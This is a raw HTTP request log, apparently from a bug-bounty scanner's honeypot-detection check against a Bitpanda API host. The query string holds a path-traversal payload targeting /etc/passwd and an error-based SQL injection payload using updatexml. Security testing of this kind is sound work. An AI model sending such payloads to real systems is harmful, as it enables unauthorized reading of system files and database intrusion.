[honeypot-detect] Dumped HTTP request for https://api-segment.bitpanda.com/?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1)


GET /?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1) HTTP/1.1
Host: api-segment.bitpanda.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0
Connection: close
Accept: */*
Accept-Language: en
Cookie: _cfuvid=3R9qWAMaI9VJVqXeGrxwxTfAYv.kFupI9Fg1byXoPMI-1754398188034-0.0.1.1-604800000; _cfuvid=UbX6vbjWQCO70DUgy0jg4A8hb5sRgJfR3H6FAQyj21Y-1754398200901-0.0.1.1-604800000
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


